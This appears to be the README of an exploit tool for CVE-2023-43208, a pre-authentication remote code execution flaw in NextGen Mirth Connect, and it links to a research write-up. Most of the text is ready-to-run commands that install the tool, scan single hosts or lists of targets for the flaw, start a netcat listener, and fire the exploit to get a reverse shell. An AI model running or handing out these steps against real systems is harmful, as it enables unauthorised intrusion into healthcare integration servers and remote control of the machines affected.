A vulnerability exists within Mirth Connect due to its mishandling of deserialized data. This vulnerability can be leveraged by an attacker using a crafted HTTP request to execute OS commands within the context of the target application.
# Clone this repository and install the dependencies
cd NextGen-Mirth-Connect-Exploit
pip3 install -r requirements.txt
# Check if a target is vulnerable
python3 mirth_connect_exploit.py -t IP -p port
# Check a list of targets in a file
python3 mirth_connect_exploit.py -f FILE
# Exploit a target to get a reverse shell
nc -lvnp port   # start a listener
python3 mirth_connect_exploit.py -t IP -p port -lh localhost -lp localport --exploit
https://www.horizon3.ai/attack-research/attack-blogs/writeup-for-cve-2023-43208-nextgen-mirth-connect-pre-auth-rce/